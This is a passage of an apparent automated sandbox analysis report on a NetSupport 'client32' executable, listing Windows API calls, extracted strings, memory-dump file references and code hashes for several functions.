                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                        • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                        • API String ID: 2188719708-2019804778
                                                                                        • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                        • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                        • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                        • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                        APIs
                                                                                          • Part of subcall function 11089560: UnhookWindowsHookEx.USER32 ref: 11089583
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11027914
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • WaitForMultipleObjects.KERNEL32 ref: 11027983
                                                                                        • PostMessageA.USER32 ref: 110279A0
                                                                                        • SetEvent.KERNEL32(0000015C), ref: 110279B1
                                                                                        • Sleep.KERNEL32(00000032), ref: 110279B9
                                                                                        • PostMessageA.USER32 ref: 110279EE
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 11027A1A
                                                                                        • GetThreadDesktop.USER32(00000000), ref: 11027A21
                                                                                        • SetThreadDesktop.USER32 ref: 11027A2A
                                                                                        • CloseDesktop.USER32 ref: 11027A35
                                                                                        • CloseHandle.KERNEL32(00000234), ref: 11027A75
                                                                                          • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                          • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                          • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(``N,?,11031700,00000001,00000000), ref: 11110E98
                                                                                          • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(``N,?,11031700), ref: 11110EAC
                                                                                          • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                        • String ID: Async
                                                                                        • API String ID: 3276504616-2933828738
                                                                                        • Opcode ID: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
                                                                                        • Instruction ID: e67d87833e8f5e22c8d898940d2622bc971bcbde67a649a31d645776c06e00d8
                                                                                        • Opcode Fuzzy Hash: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
                                                                                        • Instruction Fuzzy Hash: 1441DF74B427259BE705DFE4C884B6AF7A8BB54718F000178E921DB688EB70A900CB91
                                                                                        APIs
                                                                                          • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                          • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                          • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                          • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                          • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                        • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                          • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                          • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                        • wsprintfA.USER32 ref: 1103F5D1
                                                                                        • GetSystemMenu.USER32 ref: 1103F5F6
                                                                                        • EnableMenuItem.USER32 ref: 1103F604
                                                                                        • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                        • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                          • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                          • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                          • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                        • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1300213680-78349004
                                                                                        • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                        • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                        • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                        • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 1105F251
                                                                                        • wsprintfA.USER32 ref: 1105F265
                                                                                          • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000), ref: 110ED59B
                                                                                          • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
                                                                                        • wsprintfA.USER32 ref: 1105F5D6
                                                                                          • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                          • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                        • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 273891520-33395967
                                                                                        • Opcode ID: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
                                                                                        • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                        • Opcode Fuzzy Hash: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
                                                                                        • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                        APIs
                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11059C29
                                                                                        • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 11059C3A
                                                                                        • DeleteObject.GDI32(?), ref: 11059C4B
                                                                                        • PostMessageA.USER32 ref: 11059CB6
                                                                                        • GetCursorPos.USER32(?), ref: 11059CED
                                                                                          • Part of subcall function 110585A0: GetTickCount.KERNEL32(Client,DisableWirelessInfo,00000000,00000000,B24479DC,?,?,?), ref: 11058616
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5
                                                                                        • GetDC.USER32(00000000), ref: 11059CBE
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 11059CCB
                                                                                        • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11059CD7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11059CE0
                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 11059D2B
                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 11059D31
                                                                                        • GetTickCount.KERNEL32 ref: 11059D9D
                                                                                        • _free.LIBCMT ref: 11059E20
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
                                                                                        • String ID:
                                                                                        • API String ID: 4025550384-0
                                                                                        • Opcode ID: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
                                                                                        • Instruction ID: abc6ed23ccba68bf9f12691c10e6e213c1dc765ac58f2aea97efe2483c19e439
                                                                                        • Opcode Fuzzy Hash: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
                                                                                        • Instruction Fuzzy Hash: 41A1A271E007099FEBA5DF64C984BEABBF8BF49304F10456DE51A97284EB70A980CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __wcstoi64
                                                                                        • String ID: Adding Journal Item, type=%d$Client$DisableJournal$Journal prevented duplicate lesson details$NC_JOURNAL jcmd=%d$Start Journal, params=%s$Stop Journal$TraceJournal$_debug$libhpdf.dll
                                                                                        • API String ID: 398114495-2831585317
                                                                                        • Opcode ID: 203af461ad6f42f92b1f722168bf1edabb8d7737599ffdeb83d12517f56ea3f0
                                                                                        • Instruction ID: 035b83a0cb74351545b72c4d140cfb5a1e93af7cf425db96e5df00653b109bf5
                                                                                        • Opcode Fuzzy Hash: 203af461ad6f42f92b1f722168bf1edabb8d7737599ffdeb83d12517f56ea3f0
                                                                                        • Instruction Fuzzy Hash: FFE19578E0420ADFDB05DBA4C8D0FEEB7B5AF49308F248178D8559B784EB75A904CB52
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                        • API String ID: 2111968516-2092292787
                                                                                        • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                        • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                        • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                        • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000002), ref: 1104DA8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value__wcstoi64
                                                                                        • String ID: %s|%s|$Client$DisableReconnect$MacAddress$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                                        • API String ID: 2540774538-4016704742
                                                                                        • Opcode ID: 57d7aad6e991e3df088d1ffd76509d0321b7a4523fdcfdd66f865d7433f96b25
                                                                                        • Instruction ID: 05e8bff5040e29a5b9abc2ffadfdacbba53fbc28b77198bd54f2eb1c0cd91964
                                                                                        • Opcode Fuzzy Hash: 57d7aad6e991e3df088d1ffd76509d0321b7a4523fdcfdd66f865d7433f96b25
                                                                                        • Instruction Fuzzy Hash: 6871A475E00205AFEB14CBA4CC85FEEF7A8EF59318F24456CE519AB680DB71B900CB61
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32(B24479DC,00000000,0000000A,?), ref: 110695BD
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                        • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                        • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3,000000FF), ref: 11069621
                                                                                        • wsprintfA.USER32 ref: 11069651
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                        Strings
                                                                                        • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                        • idata->n_connections=%d, xrefs: 1106964B
                                                                                        • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                        • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                        • API String ID: 2285713701-3017572385
                                                                                        • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                        • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                        • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                        • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                        APIs
                                                                                          • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                          • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                          • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                        • _strrchr.LIBCMT ref: 1100D6EF
